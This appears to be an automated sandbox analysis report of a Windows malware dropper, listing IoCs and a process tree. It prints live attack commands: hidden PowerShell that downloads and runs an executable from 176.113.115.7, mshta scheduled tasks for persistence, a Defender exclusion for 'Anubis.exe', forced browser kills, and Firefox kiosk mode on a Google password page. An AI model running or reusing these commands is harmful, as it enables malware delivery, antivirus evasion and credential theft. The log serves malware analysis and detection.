pid Process 592 powershell.exe 592 powershell.exe 3868 TempONUGHFIS9I7KIQFJNSCRLYXBBBVHJEPS.EXE 3868 TempONUGHFIS9I7KIQFJNSCRLYXBBBVHJEPS.EXE 2112 rapes.exe 2112 rapes.exe 1968 powershell.exe 1968 powershell.exe 1968 powershell.exe 3248 powershell.exe 3248 powershell.exe 3248 powershell.exe 4460 TempUOM7NTIUYDO3GLZCCMLKZE9NBGLHPREH.EXE 4460 TempUOM7NTIUYDO3GLZCCMLKZE9NBGLHPREH.EXE 8 powershell.exe 8 powershell.exe 8 powershell.exe 624 powershell.exe 624 powershell.exe 624 powershell.exe 2864 powershell.exe 2864 powershell.exe 2864 powershell.exe 4268 Wlm2fCOKWi.exe 4268 Wlm2fCOKWi.exe 2448 483d2fa8a0d53818306efeb32d3.exe 2448 483d2fa8a0d53818306efeb32d3.exe 8 fd91aeb028.exe 8 fd91aeb028.exe 3184 285da3311c.exe 3184 285da3311c.exe 3184 285da3311c.exe 3184 285da3311c.exe 1972 50961a4f5f.exe 1972 50961a4f5f.exe 4052 81eb0d0c11.exe 4052 81eb0d0c11.exe 4052 81eb0d0c11.exe 4052 81eb0d0c11.exe 4052 81eb0d0c11.exe 4052 81eb0d0c11.exe 4428 rapes.exe 4428 rapes.exe 2016 6d19d80c13.exe 2016 6d19d80c13.exe 2016 6d19d80c13.exe 2016 6d19d80c13.exe 2016 6d19d80c13.exe 2016 6d19d80c13.exe 3228 ce4pMzk.exe 3228 ce4pMzk.exe 3228 ce4pMzk.exe 3228 ce4pMzk.exe 3228 ce4pMzk.exe 680 191911f265.exe 680 191911f265.exe 680 191911f265.exe 680 191911f265.exe 680 191911f265.exe 680 191911f265.exe 4600 ab73b377eb.exe 4600 ab73b377eb.exe 4400 730UXSVALTDSRR61MUM.exe 4400 730UXSVALTDSRR61MUM.exe -
Suspicious use of AdjustPrivilegeToken 20 IoCs
description pid Process Token: SeDebugPrivilege 592 powershell.exe Token: SeDebugPrivilege 1968 powershell.exe Token: SeDebugPrivilege 3248 powershell.exe Token: SeDebugPrivilege 8 powershell.exe Token: SeDebugPrivilege 624 powershell.exe Token: SeDebugPrivilege 2864 powershell.exe Token: SeDebugPrivilege 4268 Wlm2fCOKWi.exe Token: SeDebugPrivilege 2008 285da3311c.exe Token: SeDebugPrivilege 3228 ce4pMzk.exe Token: SeDebugPrivilege 876 powershell.exe Token: SeDebugPrivilege 4040 taskkill.exe Token: SeDebugPrivilege 4256 taskkill.exe Token: SeDebugPrivilege 4972 taskkill.exe Token: SeDebugPrivilege 2372 taskkill.exe Token: SeDebugPrivilege 3348 taskkill.exe Token: SeDebugPrivilege 2240 firefox.exe Token: SeDebugPrivilege 2240 firefox.exe Token: SeDebugPrivilege 5356 a59235b83d.exe Token: SeDebugPrivilege 5576 OF1ZtztMSC.exe Token: SeDebugPrivilege 5624 chromium.exe -
Suspicious use of FindShellTrayWindow 37 IoCs
pid Process 2900 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 2900 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 2900 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 2760 dd5195d9cc.exe 2760 dd5195d9cc.exe 2760 dd5195d9cc.exe 4088 637ecdac09.exe 4088 637ecdac09.exe 4088 637ecdac09.exe 4088 637ecdac09.exe 4088 637ecdac09.exe 4088 637ecdac09.exe 4088 637ecdac09.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 4088 637ecdac09.exe 4088 637ecdac09.exe 4088 637ecdac09.exe -
Suspicious use of SendNotifyMessage 36 IoCs
pid Process 2900 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 2900 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 2900 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 2760 dd5195d9cc.exe 2760 dd5195d9cc.exe 2760 dd5195d9cc.exe 4088 637ecdac09.exe 4088 637ecdac09.exe 4088 637ecdac09.exe 4088 637ecdac09.exe 4088 637ecdac09.exe 4088 637ecdac09.exe 4088 637ecdac09.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 2240 firefox.exe 4088 637ecdac09.exe 4088 637ecdac09.exe 4088 637ecdac09.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2240 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2900 wrote to memory of 5044 2900 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 87 PID 2900 wrote to memory of 5044 2900 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 87 PID 2900 wrote to memory of 5044 2900 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 87 PID 2900 wrote to memory of 3140 2900 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 88 PID 2900 wrote to memory of 3140 2900 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 88 PID 2900 wrote to memory of 3140 2900 c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe 88 PID 5044 wrote to memory of 2092 5044 cmd.exe 90 PID 5044 wrote to memory of 2092 5044 cmd.exe 90 PID 5044 wrote to memory of 2092 5044 cmd.exe 90 PID 3140 wrote to memory of 592 3140 mshta.exe 91 PID 3140 wrote to memory of 592 3140 mshta.exe 91 PID 3140 wrote to memory of 592 3140 mshta.exe 91 PID 592 wrote to memory of 3868 592 powershell.exe 98 PID 592 wrote to memory of 3868 592 powershell.exe 98 PID 592 wrote to memory of 3868 592 powershell.exe 98 PID 3868 wrote to memory of 2112 3868 TempONUGHFIS9I7KIQFJNSCRLYXBBBVHJEPS.EXE 101 PID 3868 wrote to memory of 2112 3868 TempONUGHFIS9I7KIQFJNSCRLYXBBBVHJEPS.EXE 101 PID 3868 wrote to memory of 2112 3868 TempONUGHFIS9I7KIQFJNSCRLYXBBBVHJEPS.EXE 101 PID 2112 wrote to memory of 2760 2112 rapes.exe 102 PID 2112 wrote to memory of 2760 2112 rapes.exe 102 PID 2112 wrote to memory of 2760 2112 rapes.exe 102 PID 2760 wrote to memory of 2764 2760 dd5195d9cc.exe 103 PID 2760 wrote to memory of 2764 2760 dd5195d9cc.exe 103 PID 2760 wrote to memory of 2764 2760 dd5195d9cc.exe 103 PID 2760 wrote to memory of 2572 2760 dd5195d9cc.exe 104 PID 2760 wrote to memory of 2572 2760 dd5195d9cc.exe 104 PID 2760 wrote to memory of 2572 2760 dd5195d9cc.exe 104 PID 2764 wrote to memory of 836 2764 cmd.exe 106 PID 2764 wrote to memory of 836 2764 cmd.exe 106 PID 2764 wrote to memory of 836 2764 cmd.exe 106 PID 2572 wrote to memory of 1968 2572 mshta.exe 107 PID 2572 wrote to memory of 1968 2572 mshta.exe 107 PID 2572 wrote to memory of 1968 2572 mshta.exe 107 PID 2112 wrote to memory of 5016 2112 rapes.exe 109 PID 2112 wrote to memory of 5016 2112 rapes.exe 109 PID 2112 wrote to memory of 5016 2112 rapes.exe 109 PID 5016 wrote to memory of 3824 5016 cmd.exe 111 PID 5016 wrote to memory of 3824 5016 cmd.exe 111 PID 5016 wrote to memory of 3824 5016 cmd.exe 111 PID 1968 wrote to memory of 4460 1968 powershell.exe 112 PID 1968 wrote to memory of 4460 1968 powershell.exe 112 PID 1968 wrote to memory of 4460 1968 powershell.exe 112 PID 5016 wrote to memory of 4640 5016 cmd.exe 113 PID 5016 wrote to memory of 4640 5016 cmd.exe 113 PID 5016 wrote to memory of 4640 5016 cmd.exe 113 PID 4640 wrote to memory of 3248 4640 cmd.exe 114 PID 4640 wrote to memory of 3248 4640 cmd.exe 114 PID 4640 wrote to memory of 3248 4640 cmd.exe 114 PID 5016 wrote to memory of 4940 5016 cmd.exe 115 PID 5016 wrote to memory of 4940 5016 cmd.exe 115 PID 5016 wrote to memory of 4940 5016 cmd.exe 115 PID 4940 wrote to memory of 8 4940 cmd.exe 116 PID 4940 wrote to memory of 8 4940 cmd.exe 116 PID 4940 wrote to memory of 8 4940 cmd.exe 116 PID 5016 wrote to memory of 452 5016 cmd.exe 117 PID 5016 wrote to memory of 452 5016 cmd.exe 117 PID 5016 wrote to memory of 452 5016 cmd.exe 117 PID 452 wrote to memory of 624 452 cmd.exe 118 PID 452 wrote to memory of 624 452 cmd.exe 118 PID 452 wrote to memory of 624 452 cmd.exe 118 PID 5016 wrote to memory of 3436 5016 cmd.exe 119 PID 5016 wrote to memory of 3436 5016 cmd.exe 119 PID 5016 wrote to memory of 3436 5016 cmd.exe 119 PID 2112 wrote to memory of 3176 2112 rapes.exe 120 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe"C:\Users\Admin\AppData\Local\Temp\c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn lTPctmafULB /tr "mshta C:\Users\Admin\AppData\Local\Temp\K6WkcacVe.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn lTPctmafULB /tr "mshta C:\Users\Admin\AppData\Local\Temp\K6WkcacVe.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2092
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\K6WkcacVe.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3140 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ONUGHFIS9I7KIQFJNSCRLYXBBBVHJEPS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:592 -
C:\Users\Admin\AppData\Local\TempONUGHFIS9I7KIQFJNSCRLYXBBBVHJEPS.EXE"C:\Users\Admin\AppData\Local\TempONUGHFIS9I7KIQFJNSCRLYXBBBVHJEPS.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Users\Admin\AppData\Local\Temp\10104610101\dd5195d9cc.exe"C:\Users\Admin\AppData\Local\Temp\10104610101\dd5195d9cc.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn Z8dPPmadele /tr "mshta C:\Users\Admin\AppData\Local\Temp\QuQG3gdKp.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn Z8dPPmadele /tr "mshta C:\Users\Admin\AppData\Local\Temp\QuQG3gdKp.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:836
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\QuQG3gdKp.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UOM7NTIUYDO3GLZCCMLKZE9NBGLHPREH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Users\Admin\AppData\Local\TempUOM7NTIUYDO3GLZCCMLKZE9NBGLHPREH.EXE"C:\Users\Admin\AppData\Local\TempUOM7NTIUYDO3GLZCCMLKZE9NBGLHPREH.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4460
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10104620121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3248
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:624
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "5zEtPma5iIE" /tr "mshta \"C:\Temp\JYcRlAUhs.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3436
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\JYcRlAUhs.hta"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3996 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2864 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2448
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3176 -
C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"7⤵
- Executes dropped EXE
PID:1852
-
-
C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3552 -
C:\Users\Admin\AppData\Roaming\5yWptUDTos.exe"C:\Users\Admin\AppData\Roaming\5yWptUDTos.exe"8⤵
- Executes dropped EXE
PID:3248
-
-
C:\Users\Admin\AppData\Roaming\Wlm2fCOKWi.exe"C:\Users\Admin\AppData\Roaming\Wlm2fCOKWi.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4268
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3176 -s 8167⤵
- Program crash
PID:456
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104850101\fd91aeb028.exe"C:\Users\Admin\AppData\Local\Temp\10104850101\fd91aeb028.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:8 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:5060
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104860101\285da3311c.exe"C:\Users\Admin\AppData\Local\Temp\10104860101\285da3311c.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2008 -
C:\Users\Admin\AppData\Local\Temp\10104860101\285da3311c.exe"C:\Users\Admin\AppData\Local\Temp\10104860101\285da3311c.exe"7⤵
- Executes dropped EXE
PID:1840
-
-
C:\Users\Admin\AppData\Local\Temp\10104860101\285da3311c.exe"C:\Users\Admin\AppData\Local\Temp\10104860101\285da3311c.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3184
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 8207⤵
- Program crash
PID:668
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104870101\50961a4f5f.exe"C:\Users\Admin\AppData\Local\Temp\10104870101\50961a4f5f.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1972 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:3348
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104880101\81eb0d0c11.exe"C:\Users\Admin\AppData\Local\Temp\10104880101\81eb0d0c11.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4052
-
-
C:\Users\Admin\AppData\Local\Temp\10104890101\6d19d80c13.exe"C:\Users\Admin\AppData\Local\Temp\10104890101\6d19d80c13.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2016
-
-
C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3228 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\cejMam5S\Anubis.exe""7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:876
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104920101\191911f265.exe"C:\Users\Admin\AppData\Local\Temp\10104920101\191911f265.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:680 -
C:\Users\Admin\AppData\Local\Temp\730UXSVALTDSRR61MUM.exe"C:\Users\Admin\AppData\Local\Temp\730UXSVALTDSRR61MUM.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4400
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104930101\ab73b377eb.exe"C:\Users\Admin\AppData\Local\Temp\10104930101\ab73b377eb.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4600
-
-
C:\Users\Admin\AppData\Local\Temp\10104940101\637ecdac09.exe"C:\Users\Admin\AppData\Local\Temp\10104940101\637ecdac09.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4088 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4040
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4256
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2372
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3348
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:3860
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2240 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1944 -prefMapHandle 1936 -prefsLen 27368 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a2f44b1-97af-4c84-9b55-3e346717dfda} 2240 "\\.\pipe\gecko-crash-server-pipe.2240" gpu9⤵PID:1720
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2464 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2436 -prefsLen 28288 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {87934c73-8f23-417c-b02d-81d5cbaf99b0} 2240 "\\.\pipe\gecko-crash-server-pipe.2240" socket9⤵PID:2452
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3036 -childID 1 -isForBrowser -prefsHandle 3028 -prefMapHandle 1612 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eeb58d7e-3837-4350-8842-1a006b109e26} 2240 "\\.\pipe\gecko-crash-server-pipe.2240" tab9⤵PID:384
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4008 -childID 2 -isForBrowser -prefsHandle 4000 -prefMapHandle 3996 -prefsLen 32778 -prefMapSize 244628 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {24a8a661-73c1-4375-826c-21540e9922e5} 2240 "\\.\pipe\gecko-crash-server-pipe.2240" tab9⤵PID:1616
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4160 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4884 -prefMapHandle 4880 -prefsLen 32852 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee5fd668-3e3b-49b2-998d-03faed3feed9} 2240 "\\.\pipe\gecko-crash-server-pipe.2240" utility9⤵
- Checks processor information in registry
